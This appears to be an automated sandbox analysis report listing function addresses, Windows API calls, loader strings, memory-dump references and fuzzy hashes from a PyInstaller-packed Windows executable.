Function 00007FF73AE175A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF73AE17716

Part of subcall function 00007FF73AE20250: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE20264

Part of subcall function 00007FF73AE20224: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE20238

Strings

%s%c%s, xrefs: 00007FF73AE175E5
ERROR: file already exists but should not: %s, xrefs: 00007FF73AE1767C
\, xrefs: 00007FF73AE175EC
WARNING: file already exists but should not: %s, xrefs: 00007FF73AE17698
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF73AE17632

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: 43727e2b7280e09f935105e65e29158365b4f6ac20193684fbb2c56705301ad1
Instruction ID: 5d5cd9043f092499a78e85a07162d02323ec846e54023349b8e79490eccab20e
Opcode Fuzzy Hash: 43727e2b7280e09f935105e65e29158365b4f6ac20193684fbb2c56705301ad1
Instruction Fuzzy Hash: E151B26DE8D66361FA10B725E9532F9E2915F86F80FC400F0E91D872C6EE2CE900B760

Function 00007FF73AE17420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF73AE179A1,00000000,?,00000000,00000000,?,00007FF73AE1154F), ref: 00007FF73AE1747F

Part of subcall function 00007FF73AE12B30: MessageBoxW.USER32 ref: 00007FF73AE12C05

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF73AE17456
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF73AE174DA
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF73AE17493

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction ID: 19df55aff2ad1aeb20b2c33c6c19365d28ae9d31050dacd51f38338fe4588a95
Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction Fuzzy Hash: 7E31EC59F9C75260FA20B721D9533BAE251AF99BC0FC444F5DA4E427D6EE3CE104BA20

Function 00007FF73AE1DDB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE3D
GetLastError.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE75
FreeLibrary.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DEBB
GetProcAddress.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DEC7

Strings

api-ms-, xrefs: 00007FF73AE1DE5D

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction ID: 89de9fff27a0e317d41dd9b0f66d6a03213f8d072f92414840395a80cbcbddc8
Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction Fuzzy Hash: 9331C729F5A652A1FE11FB42D843979A3D4BF54BA1F9906B4DE1E4B390DF3CE4409320

Function 00007FF73AE18AE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18BA0

Strings

Out of memory., xrefs: 00007FF73AE18B62
win32_utils_from_utf8, xrefs: 00007FF73AE18B69
MultiByteToWideChar, xrefs: 00007FF73AE18B2E, 00007FF73AE18BB1
Failed to get wchar_t buffer size., xrefs: 00007FF73AE18B27
Failed to decode wchar_t from UTF-8, xrefs: 00007FF73AE18BAA

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction ID: d5e492c7cc8c2a5e9f402b36f0bca793533e77e81b957bb7f82b431de0f01b80
Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction Fuzzy Hash: F621802AB08A5291FB10FB19F843069E3A1AB84BC4BC846B1DB4C43BA9EF2DD5519710

Function 00007FF73AE2B710 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF73AE2B71F
FlsGetValue.KERNEL32 ref: 00007FF73AE2B734
FlsSetValue.KERNEL32 ref: 00007FF73AE2B755
FlsSetValue.KERNEL32 ref: 00007FF73AE2B782
FlsSetValue.KERNEL32 ref: 00007FF73AE2B793
FlsSetValue.KERNEL32 ref: 00007FF73AE2B7A4
SetLastError.KERNEL32 ref: 00007FF73AE2B7BF

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
Instruction ID: a822b9a2e119fcd36897484cd43e3e1153afff384debadf8368ed18e4bc7fc90
Opcode Fuzzy Hash: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
Instruction Fuzzy Hash: C5217C2CAC824B62FA6477315A57179E2525F847B0F9047B8E83E47BC6DE2CA8016720

Function 00007FF73AE385BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF73AE385ED
GetLastError.KERNEL32 ref: 00007FF73AE385F9
CloseHandle.KERNEL32 ref: 00007FF73AE38611
CreateFileW.KERNEL32 ref: 00007FF73AE3863C
WriteConsoleW.KERNEL32 ref: 00007FF73AE3865B

Strings

CONOUT$, xrefs: 00007FF73AE3861D

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction ID: aa1518909b8360b0cbc081cbb7c8472cbbdb8c12f7f3454955d37ced7cd9f33a
Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction Fuzzy Hash: 2E11D325B58A5196F750BB12E857329B3A4FB88FE0F804274DA1E877E4CF7DD4048750

Function 00007FF73AE2B888 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B897
FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B8CD
FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B8FA
FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B90B
FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B91C
SetLastError.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B937

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
Instruction ID: 91b7a0ca15c3e918ba06c9c33e7e587c4565c1e2c6ad067422c5d35b77f7306e
Opcode Fuzzy Hash: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
Instruction Fuzzy Hash: 21118E28ECC64A62FA1877315A47179E2519F847B0FC447B8E83E467C7DE6CB8016720

Function 00007FF73AE1D778 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73AE1D7A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF73AE1D838
RtlUnwindEx.KERNEL32 ref: 00007FF73AE1D887

Strings

f, xrefs: 00007FF73AE1D7B6
csm, xrefs: 00007FF73AE1D81E

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction ID: 37c3d4357f78bf30c75d3d2d1acaf2130333b67a23673a6545cd9eecfcd0f510
Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction Fuzzy Hash: DF511A3AB55262A6F714FF51E486A28B795FB80B94F9082F0DD4E07748EF78E840D710

Function 00007FF73AE12600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF73AE127EF), ref: 00007FF73AE12638
DialogBoxIndirectParamW.USER32 ref: 00007FF73AE126FC
DeleteObject.GDI32 ref: 00007FF73AE1272F
DestroyIcon.USER32 ref: 00007FF73AE12741

Strings

Unhandled exception in script, xrefs: 00007FF73AE12668

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
Instruction ID: e7a8c34cb7ed4d9ac6318b83baf1681eccc7761473b637f94a53473859fdfdf7
Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
Instruction Fuzzy Hash: B531803AA4868298FB24FB61E8571F9A360FF89784F800175EA4D47B55DF3CD105D710

Function 00007FF73AE129E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14

Part of subcall function 00007FF73AE18560: GetLastError.KERNEL32(00000000,00007FF73AE12A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18587
Part of subcall function 00007FF73AE18560: FormatMessageW.KERNEL32 ref: 00007FF73AE185B6

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

MessageBoxW.USER32 ref: 00007FF73AE12AF0
MessageBoxA.USER32 ref: 00007FF73AE12B0C

Strings

Fatal error detected, xrefs: 00007FF73AE12AC6, 00007FF73AE12AFE
%s%s: %s, xrefs: 00007FF73AE12A6B

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction ID: 786cc51dfba40600aa19bee2903a36375466a2020db95c5e414f214ef8c45bef
Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction Fuzzy Hash: 93317076A68692A1F630FB10E4536EAA364FF84B84F804176E68D03A99DF3CD605DB50

Function 00007FF73AE2A018 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF73AE2A03D
GetProcAddress.KERNEL32 ref: 00007FF73AE2A053
FreeLibrary.KERNEL32 ref: 00007FF73AE2A07A

Strings

mscoree.dll, xrefs: 00007FF73AE2A034
CorExitProcess, xrefs: 00007FF73AE2A04C

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction ID: b96776d499cbf5c44137ee5191a2921d47a858837ad79e9225430cb3ef570cfe
Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction Fuzzy Hash: 56F0C229E48706A1FB14BB24E8577799360EF48B60FC40279C66E461E4CF3DD488E320

Function 00007FF73AE39C40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF73AE39C68
_set_statfp.LIBCMT ref: 00007FF73AE39C83
_set_statfp.LIBCMT ref: 00007FF73AE39C9F
_set_statfp.LIBCMT ref: 00007FF73AE39CDB

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: aa0f80966d718ea0341dd0535069942788dd7a6e97d67b8599895dcbbe18fb3f
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: A011913AE9CA0321F6543128E467379D4806F94F70E8806B4E96E073DACF2FA8816220

Function 00007FF73AE2B950 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B96F
FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B98E
FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9B6
FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9C7
FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9D8

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
Instruction ID: b0187621bd9460ff08a50361c0c798b86e11a7c6b7e70e25594e2ff569f1023a
Opcode Fuzzy Hash: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
Instruction Fuzzy Hash: 94117228FC824A61FA54B7769A53179E2415F443B0FC443B8E87D467C6DE2CE841A720

Function 00007FF73AE2B7E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF73AE2B7F5
FlsSetValue.KERNEL32 ref: 00007FF73AE2B814
FlsSetValue.KERNEL32 ref: 00007FF73AE2B83C
FlsSetValue.KERNEL32 ref: 00007FF73AE2B84D
FlsSetValue.KERNEL32 ref: 00007FF73AE2B85E

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
Instruction ID: 509f0af61dc0abd18ddb2578761db6630520426916c230be9ef68c24bcfbc38c
Opcode Fuzzy Hash: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
Instruction Fuzzy Hash: D311E528EC920F62F96C767159531BAA2815F85370FD847BCD93E4A2D3DD2CB811B631

Function 00007FF73AE264B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE264F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2661A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE266D0

Strings

verbose, xrefs: 00007FF73AE264C4

Memory Dump Source

